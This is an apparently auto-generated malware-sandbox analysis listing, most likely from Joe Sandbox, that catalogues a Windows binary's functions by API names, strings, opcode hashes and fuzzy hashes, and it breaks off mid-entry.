                                                                            Similarity
                                                                            • API ID: UpdateWindow$BeepClientMessageScreen
                                                                            • String ID:
                                                                            • API String ID: 1712693409-0
                                                                            • Opcode ID: 2c9b4c39bf5f28b4a4ca781e88612102ef142eaaf9e77b825b2f4a2796aa806f
                                                                            • Instruction ID: 755874ce497f43334733f2dea8404b1d3a0f2b2036e7338512a7f5edf34628af
                                                                            • Opcode Fuzzy Hash: 2c9b4c39bf5f28b4a4ca781e88612102ef142eaaf9e77b825b2f4a2796aa806f
                                                                            • Instruction Fuzzy Hash: 84917B36214A5086FA26EB63E8547ED27A1B78CFC4F048126EF1A57BB5DF78C942C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Menu$Item$Count$AppendInsertStateString
                                                                            • String ID:
                                                                            • API String ID: 420201382-0
                                                                            • Opcode ID: 300b395d40a23efb28ae1050f738a76f4d140311f655c85d3d6aba0b5abd86f1
                                                                            • Instruction ID: 2cbc890e1c64921532c3d4c0cf752f4bb3199d1f1f9ad9b6e48402e9f435056c
                                                                            • Opcode Fuzzy Hash: 300b395d40a23efb28ae1050f738a76f4d140311f655c85d3d6aba0b5abd86f1
                                                                            • Instruction Fuzzy Hash: D871B136614B8086EB12CF56E84879B7761F78ABD8F110115EF9A4BBB8DF78D845CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                                                                            • String ID:
                                                                            • API String ID: 4186786570-0
                                                                            • Opcode ID: a00684709e33c799b5aa593a79369bafc3ef88f620e72fde29d9320e353ce633
                                                                            • Instruction ID: 2559d5deb80f152145e80284b1dc575e59192adf058a160f63a7f0eb9bbeaacb
                                                                            • Opcode Fuzzy Hash: a00684709e33c799b5aa593a79369bafc3ef88f620e72fde29d9320e353ce633
                                                                            • Instruction Fuzzy Hash: 4A614536708B4186FB6ADB63D8847ED27A2BB8CBC4F584425EF4A57BA4DF34C8458704
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Time$File$LocalSystem$AddressAttributesHandleModuleProcSize_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 3830226466-0
                                                                            • Opcode ID: d32400b487f652f36b1a60b8f55ff821d510fb76d198eeb4dabba01cb39b6aa8
                                                                            • Instruction ID: b7f63201505ef461441adeef1ae1f77213408ea04441c11dff7550717572fd26
                                                                            • Opcode Fuzzy Hash: d32400b487f652f36b1a60b8f55ff821d510fb76d198eeb4dabba01cb39b6aa8
                                                                            • Instruction Fuzzy Hash: E1619F32310A4596FB629F76D850BED23B4E74DB98F414622EB1A87AF9EF70C505C344
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: CaptureClientMessageMetricsScreenSendSystem$FocusRelease
                                                                            • String ID:
                                                                            • API String ID: 3871486171-0
                                                                            • Opcode ID: d345ab7c2611c5cff37ad9dc88c8bb5c10f38ae6950e1ae83df53fa9334e3945
                                                                            • Instruction ID: 84a061a98f69cf867a75a6a23783c6823e609d4056cb8a54c04d7bab0c89e74e
                                                                            • Opcode Fuzzy Hash: d345ab7c2611c5cff37ad9dc88c8bb5c10f38ae6950e1ae83df53fa9334e3945
                                                                            • Instruction Fuzzy Hash: D7518D36201A8096EB6ACF66D5947DC67A0F78CBD8F040126EF1E577A6DF78C8928340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: CreateObject$HashRectSelect$CombineCompatibleImplImpl::Pixel
                                                                            • String ID:
                                                                            • API String ID: 189907385-0
                                                                            • Opcode ID: 2de07991f312bece601cc44d6cca946f5eb6ad8800321375910915a212bc7d73
                                                                            • Instruction ID: c862973e160dec7f4f7c19c32a07d30f9d14563875d2e9a7a9822993c2ed7dfd
                                                                            • Opcode Fuzzy Hash: 2de07991f312bece601cc44d6cca946f5eb6ad8800321375910915a212bc7d73
                                                                            • Instruction Fuzzy Hash: 52416D36700A4099FB52DB63D8547DE6372B74CBC8F404126EF5A677A9DE34C90AC350
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Menu$CountItem$Remove$ExceptionThrow
                                                                            • String ID:
                                                                            • API String ID: 1900339754-0
                                                                            • Opcode ID: f4845cb20616b44370f8469525c32d22f36f1eed6b0200ce31e8e8860017d8b0
                                                                            • Instruction ID: e1aba1473171b548d9f7a1ed3f4eaf32807b3ddca3c24ec23e139c92d167576d
                                                                            • Opcode Fuzzy Hash: f4845cb20616b44370f8469525c32d22f36f1eed6b0200ce31e8e8860017d8b0
                                                                            • Instruction Fuzzy Hash: 0431B53970474182E7174BA7B4843AFA792BB8CBD0F540625EF964B7F4DEB8D8468700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Window$Enabled$FocusItemLong
                                                                            • String ID:
                                                                            • API String ID: 1558694495-0
                                                                            • Opcode ID: bc14d47aa4b79442c3aea4068fb871dfeb33e6341fc216263d7e8939d397807a
                                                                            • Instruction ID: 9e283c1fa2a3e6b1c7740dbd58a1dae252da5c9682353df0875103d6ba3fa630
                                                                            • Opcode Fuzzy Hash: bc14d47aa4b79442c3aea4068fb871dfeb33e6341fc216263d7e8939d397807a
                                                                            • Instruction Fuzzy Hash: F0216935301A4086FA12DF57B8897AA67A1AF8EFD4F180024EF9A4B7B5DE79C4428300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _cwprintf_s_l$CtrlParent
                                                                            • String ID: %TsMFCOutlookBar-%d$%TsMFCOutlookBar-%d%x$MFCOutlookBars$MFCOutlookCustomPages
                                                                            • API String ID: 1970011666-3944741965
                                                                            • Opcode ID: ae71563feeef1afb6d6264f250a19edea5ddca29c7f537d82f32420ed6985acc
                                                                            • Instruction ID: e9ded2ba45f11abdb71424a3650c184c495dd111b38332f976a2df834402c63b
                                                                            • Opcode Fuzzy Hash: ae71563feeef1afb6d6264f250a19edea5ddca29c7f537d82f32420ed6985acc
                                                                            • Instruction Fuzzy Hash: 88F16B32704A8082DA22EB67E4547EE67A1F789FD0F458126EF8E477A6DF38C545CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CompatibleCreateDrawHashState$BitmapEmptyImplImpl::Rect
                                                                            • String ID:
                                                                            • API String ID: 1835183343-3916222277
                                                                            • Opcode ID: 1dd30ef3de7893b16cbd2eaf350dfbbfb478c198fd3735748435f806fdddab59
                                                                            • Instruction ID: 2b2c4141b1b298af38f14e5f241cb1ecffaeea0d30ec29ba6a7e7e9b17cdf321
                                                                            • Opcode Fuzzy Hash: 1dd30ef3de7893b16cbd2eaf350dfbbfb478c198fd3735748435f806fdddab59
                                                                            • Instruction Fuzzy Hash: F2912676714A80CBE721CF6AE490B9D77B1F758B98F10512AEF8993B68DB34D844CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CompatibleCreateHash$BitmapFillImplImpl::Rect
                                                                            • String ID:
                                                                            • API String ID: 113466278-3916222277
                                                                            • Opcode ID: 0b6a335531ba7a3bdacd10959179f7ff58db67859003d5e4fa52df3a6ae26992
                                                                            • Instruction ID: 3c9f487d59c63fbaeb8a760d500a313c2579ee7f934ef2775b96e10e9df73757
                                                                            • Opcode Fuzzy Hash: 0b6a335531ba7a3bdacd10959179f7ff58db67859003d5e4fa52df3a6ae26992
                                                                            • Instruction Fuzzy Hash: FF716C32B14A408AEB21CFAAD4807DD77B1F798B98F044225EF4997BA8EB74C945C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MessageSend$ObjectSelect$ClientMetricsParentRectText
                                                                            • String ID: VUUU
                                                                            • API String ID: 816482960-2040033107
                                                                            • Opcode ID: c859bcf02477eb0d59cadfbb2fe709e337bc14a4784d9ba0a4638fbce7adcb5c
                                                                            • Instruction ID: 1eb4734927312e715c5e05fbd207b49a99fda62a87f31d38a6396063cc9997fa
                                                                            • Opcode Fuzzy Hash: c859bcf02477eb0d59cadfbb2fe709e337bc14a4784d9ba0a4638fbce7adcb5c
                                                                            • Instruction Fuzzy Hash: 0F71BC32711A809BEB5ADB76D454BEC7360FB89B88F084225EF5917BA5DF38D811C380
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: gfffffff$gfffffff
                                                                            • API String ID: 0-161084747
                                                                            • Opcode ID: 1f1e6a89f1d7e68e61aa7bc356aaf4b8387905e958a024812b6bf8c420eca9fe
                                                                            • Instruction ID: f0ab44d4446b7fc77edd267e8b032e05e3df68ee44204ab21907875324d82842
                                                                            • Opcode Fuzzy Hash: 1f1e6a89f1d7e68e61aa7bc356aaf4b8387905e958a024812b6bf8c420eca9fe
                                                                            • Instruction Fuzzy Hash: 5951E676602B8482EA26DB6BF4043EC6350F75CBD4F104216EFAD877A6EB34D592C302
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ItemMenu$MessageSendTextWindow$BitmapsCheckInfolstrcmp
                                                                            • String ID: @$P
                                                                            • API String ID: 72408025-358147200
                                                                            • Opcode ID: 9b4a1d331ab9b5b9905df8cd75909a6b647ed332f2d9b0f823c18f192af6fe88
                                                                            • Instruction ID: d876959027bd8ad338ba3663127eb71566e54495c98ea9fe1bf380ec3c8c3c65
                                                                            • Opcode Fuzzy Hash: 9b4a1d331ab9b5b9905df8cd75909a6b647ed332f2d9b0f823c18f192af6fe88
                                                                            • Instruction Fuzzy Hash: A341803670064482EB369B57E444BAE6360FB88BC8F658825EF4D47AB5DF39C8428744
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Resource$FindFreeLoadLockSizeofWindow
                                                                            • String ID: AFX_DIALOG_LAYOUT
                                                                            • API String ID: 4180966417-2436846380
                                                                            • Opcode ID: 2724af04415aef2300b408afa8ede3cad56ec821975ae9afec82ea3c9e9e527c
                                                                            • Instruction ID: 3e6dca832cb4ddcea6f4b38cf49366494ca433c757d1734ad14e1a37070202a0
                                                                            • Opcode Fuzzy Hash: 2724af04415aef2300b408afa8ede3cad56ec821975ae9afec82ea3c9e9e527c
                                                                            • Instruction Fuzzy Hash: EB218435302A5185EA57DB63A8147AA6290EF8DFD0F8A4434BF494BBB5EF38C4428304
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Window$CaptureDestroyEmptyMessageParentPointsRectReleaseSendVisible
                                                                            • String ID:
                                                                            • API String ID: 3509494761-0
                                                                            • Opcode ID: 1dd3103755a72a86f26e40cb4036a7b7f95708a67c42d041ce306ccd00e559a5
                                                                            • Instruction ID: dcc2b34346dff6352a43abd05f8057f79a49abdf778e89e90ca0d4f460fb08a8
                                                                            • Opcode Fuzzy Hash: 1dd3103755a72a86f26e40cb4036a7b7f95708a67c42d041ce306ccd00e559a5
                                                                            • Instruction Fuzzy Hash: 86614B36315A8482EB5ADB67D594BED27A0BB8CFC4F084126EF4A477A2DF38C551C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Destroy$AcceleratorMessageParentSendTablestd::ios_base::~ios_base
                                                                            • String ID:
                                                                            • API String ID: 3769829651-0
                                                                            • Opcode ID: 7e4275439e416f71babe47deb490907d5c504922a8d4c22e38454664a1c7e285
                                                                            • Instruction ID: 2746fe778679dcdd7c41355b0586938590abc6458db6f299f03e2624441c3196
                                                                            • Opcode Fuzzy Hash: 7e4275439e416f71babe47deb490907d5c504922a8d4c22e38454664a1c7e285
                                                                            • Instruction Fuzzy Hash: 46416D76614A4083EB56DB23E8987E92361F7D8F94F140225EB8A4BAFADF78C541C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Window$InvalidateUpdate$CursorEmptyEventMouseOffsetRedrawTrack
                                                                            • String ID:
                                                                            • API String ID: 898900272-0
                                                                            • Opcode ID: f44cfa395ae84e5a75cf22e06b5b3ad1efdd4674c80543037bf5baf526d2eda8
                                                                            • Instruction ID: 44a3f421ae71f3cbfd92bebdaaef7c036aef86a4dc5d23fe98613d0fa3f57648
                                                                            • Opcode Fuzzy Hash: f44cfa395ae84e5a75cf22e06b5b3ad1efdd4674c80543037bf5baf526d2eda8
                                                                            • Instruction Fuzzy Hash: 71315BB2704B8097F7598B23D51879A77A2F788F85F440116CB4947BA0DF79D975CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: *?<>|
                                                                            • API String ID: 3850602802-3491500753
                                                                            • Opcode ID: 189567c8db9f998c3b384a030d883ac9a0580e8dbd92e0a00ae925a14ce7e0dc
                                                                            • Instruction ID: d04b4e73322d1e88e80239e2509df6a60a6e6297548a505dfe526319ef944143
                                                                            • Opcode Fuzzy Hash: 189567c8db9f998c3b384a030d883ac9a0580e8dbd92e0a00ae925a14ce7e0dc
                                                                            • Instruction Fuzzy Hash: 41028776705B8182EA05EB67E8953EE63A1F78DBD0F495012EF89837A6DF78C841C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem$Long$ClassMessageSend$DrawExtentIconParentPoint32TextWindow
                                                                            • String ID:
                                                                            • API String ID: 2492759098-0
                                                                            • Opcode ID: cefacff278c3597989e92d034f42deb3e9b76a862fb833b296513c2a6cd9c292
                                                                            • Instruction ID: a3f7d2c106c1ef24765c38f413403dd9dc2ebf8af7e83e85ebc0c8878830683f
                                                                            • Opcode Fuzzy Hash: cefacff278c3597989e92d034f42deb3e9b76a862fb833b296513c2a6cd9c292
                                                                            • Instruction Fuzzy Hash: 3BA1BE36B10A408AEB06DF66E4487ED33A1B78DBD8F044225EF5A53BA5DF38C505C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$BringHookWindowWindows$CurrentThreadUnhook
                                                                            • String ID: mdiclient
                                                                            • API String ID: 320092646-1999401180
                                                                            • Opcode ID: 61338ff33872063c71c3164406f07be044dc1fda79021bf4c167b97f8fa8890a
                                                                            • Instruction ID: 79fffb5a51818ca8cc11679eef1e11aab78abcecc438769c1460de8bfdc0f690
                                                                            • Opcode Fuzzy Hash: 61338ff33872063c71c3164406f07be044dc1fda79021bf4c167b97f8fa8890a
                                                                            • Instruction Fuzzy Hash: BA913736B05B808AEB55DFAAE4847EE37A1F788B88F144025EF4957BA9DF38C415C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: _cwprintf_s_l$Ctrl
                                                                            • String ID: %TsDockablePaneAdapter-%d$%TsDockablePaneAdapter-%d%x$BarName$Panes
                                                                            • API String ID: 1115312430-3329641806
                                                                            • Opcode ID: b8f725dec0edc425fc2445b1fb1bcc69b2e7ab45589596b726a634dfc755755e
                                                                            • Instruction ID: 4bf6d0f3dbf17712561a81f1ed357ecc2ba1d93b6984012d0177c530977eeaa4
                                                                            • Opcode Fuzzy Hash: b8f725dec0edc425fc2445b1fb1bcc69b2e7ab45589596b726a634dfc755755e
                                                                            • Instruction Fuzzy Hash: 68616876710A4081EB1AEB67E8517EC23A1B74DFE4F489126DF296B7A6DF38C841C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Parent$CtrlEventNotify
                                                                            • String ID:
                                                                            • API String ID: 1661099750-0
                                                                            • Opcode ID: a857b6eadb130bcaaaffaf6670c48dbd7f4342e1ac77855a999cfb0adea4d5e5
                                                                            • Instruction ID: 11c587d979f819862aa14713adf658ae397684f3a62e734c92a90e81c922affd
                                                                            • Opcode Fuzzy Hash: a857b6eadb130bcaaaffaf6670c48dbd7f4342e1ac77855a999cfb0adea4d5e5
                                                                            • Instruction Fuzzy Hash: 4F61DC36704A9086EA16DF27E844BDA7760F79CBD4F090126EF4907BB5DFB8C9918B40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteHashSelect$CompatibleImplImpl::Section
                                                                            • String ID:
                                                                            • API String ID: 1775874395-0
                                                                            • Opcode ID: 51f9e9d826dca7b0014347c0b7d94b2dc800fb54e888fc19f24d8f4cbada8c02
                                                                            • Instruction ID: 7e16959ee8c83da223a3c9f6c7831cfb05562bc3d8ec48cdb5760227ea76ca61
                                                                            • Opcode Fuzzy Hash: 51f9e9d826dca7b0014347c0b7d94b2dc800fb54e888fc19f24d8f4cbada8c02
                                                                            • Instruction Fuzzy Hash: 33616836B04A408AEB15DFB6D4547ED33B2B789B98F044116DF1A677A9CF78C446C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Empty$Copy$ClientCursorDesktopEqualParentScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 2235599899-0
                                                                            • Opcode ID: 192e31ff38b3db823627327d48c684ca060e3b4657926fd2cf1ba5ad67ff78f7
                                                                            • Instruction ID: dbca2dd95c2468c8f83ee38a7e5e8ecad4fcbbb016721990cf64161fa17f8cb3
                                                                            • Opcode Fuzzy Hash: 192e31ff38b3db823627327d48c684ca060e3b4657926fd2cf1ba5ad67ff78f7
                                                                            • Instruction Fuzzy Hash: 8E517C32B10A518AFB06DB769C447EE23A1B74CF98F084625DF4967BA9EF74C545C300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                            • String ID: pPE
                                                                            • API String ID: 3659116390-398285065
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID: MessageRectSend$Client$FocusParentScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 1639644240-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID: _cwprintf_s_l$Ctrl
                                                                            • String ID: %TsBasePane-%d$%TsBasePane-%d%x$BasePanes$IsVisible
                                                                            • API String ID: 1115312430-2169875744
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID: Time$File$LocalSystem$AddressAttributesHandleModuleProc
                                                                            • String ID:
                                                                            • API String ID: 1857739635-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID: Window$Enable$MessageParentProcess$ActiveCurrentEnabledFileLastLongModuleNamePopupSendThread
                                                                            • String ID:
                                                                            • API String ID: 2633877278-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID: Initialize$CountCriticalErrorLastSectionSpin
                                                                            • String ID: CServerConnection::SynchronizeConnectionState$CServerConnectionInstance::CServerConnectionInstance$CoInitializeEx(0, %d) returned hr=0x%08X.$Failed to get the ServerConnection instance.$SBAM.Common
                                                                            • API String ID: 4201420507-533318284
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID: Window$Redraw$CaptureClientCursorDestroyKillParentReleaseScreenTimer
                                                                            • String ID:
                                                                            • API String ID: 3484170629-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID: CaptureMessage$DispatchPeekRectWindow
                                                                            • String ID:
                                                                            • API String ID: 2008901295-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID: Window$MessageProcessSend$ActiveCurrentEnableFocusParentThread
                                                                            • String ID:
                                                                            • API String ID: 2169720751-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID: ExceptionThrow
                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                            • API String ID: 432778473-1866435925
                                                                            • Opcode ID: fca7a94e78ccb6b6cde913d61ccb4861fd7035a712d37c0c09ed6cc9e234ffcc
                                                                            • Instruction ID: dbd0038594b032e7255f605829b6a0fa310d458f9d90b69c0ca6d0d71a88b500
                                                                            • Opcode Fuzzy Hash: fca7a94e78ccb6b6cde913d61ccb4861fd7035a712d37c0c09ed6cc9e234ffcc
                                                                            • Instruction Fuzzy Hash: 6511C8B163054692FE16EB22E851BEA6310BB9C788FA04017B74E4B9F6EF74C50AC700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindFreeLoadLockSizeof
                                                                            • String ID: PNG
                                                                            • API String ID: 4159136517-364855578
                                                                            • Opcode ID: 93687c374e59481319c4d3ae486b02e7e8b752067a7dd1e921a65743edc8cba9
                                                                            • Instruction ID: fd5692a81e7f87f205bba697d3c57e12020dc1d712e930020d9b0d5ec86d86e7
                                                                            • Opcode Fuzzy Hash: 93687c374e59481319c4d3ae486b02e7e8b752067a7dd1e921a65743edc8cba9
                                                                            • Instruction Fuzzy Hash: DF11A175305B4086EE06EB5369487AA67E1BB4DFD0F084434EF8907BB5EE7CC5468300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                            • String ID: CONOUT$
                                                                            • API String ID: 3230265001-3130406586
                                                                            • Opcode ID: 2f5238129b615f644adfdc61cd7a0e4d1c110de89ebae83789b6dfdc0860481f
                                                                            • Instruction ID: 88b7969f582a8c7da5aad9a5b9531abdc1a509b790e7d8ec06eb0b7ec04453ee
                                                                            • Opcode Fuzzy Hash: 2f5238129b615f644adfdc61cd7a0e4d1c110de89ebae83789b6dfdc0860481f
                                                                            • Instruction Fuzzy Hash: ED119036320B8086F7519B13E858B9A66E2F79CFE4F404224EB59877F4DFB8C8448744
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window
                                                                            • String ID:
                                                                            • API String ID: 2353593579-0
                                                                            • Opcode ID: bd3f8361b8f9c3397e7172e64279efe113b9ed40e89afb2693c79ee536329348
                                                                            • Instruction ID: a75c32f7a963d666105cf5cda93370da7dea597e2cfd0f43f5939c7c061f6715
                                                                            • Opcode Fuzzy Hash: bd3f8361b8f9c3397e7172e64279efe113b9ed40e89afb2693c79ee536329348
                                                                            • Instruction Fuzzy Hash: 45026736314A9182EA16EBA7E8543ED23A5BB8DFD4F484926DF0E577A2DF38C441C304
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Inflate$Empty
                                                                            • String ID:
                                                                            • API String ID: 4171175343-0
                                                                            • Opcode ID: 5e0fd01b6b72547656a93d7d57fb1b6f291c04047efe1ad6c595313973f6f440
                                                                            • Instruction ID: 89b8381cf305f60904c9c20727b8590814f8b2ee730f8d17144c794297ec0216
                                                                            • Opcode Fuzzy Hash: 5e0fd01b6b72547656a93d7d57fb1b6f291c04047efe1ad6c595313973f6f440
                                                                            • Instruction Fuzzy Hash: F2F15C72A04B848AFB62DFA6D444BED33A1F74CB88F154229EF4997BA5DB34C445C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CursorDestroyParent$CopyExceptionIconRedrawThrowWindow
                                                                            • String ID:
                                                                            • API String ID: 3506574077-0
                                                                            • Opcode ID: 66932146c9bcaa270c68ee22a56249e68f246334e80308474ed53cdf21c3bb25
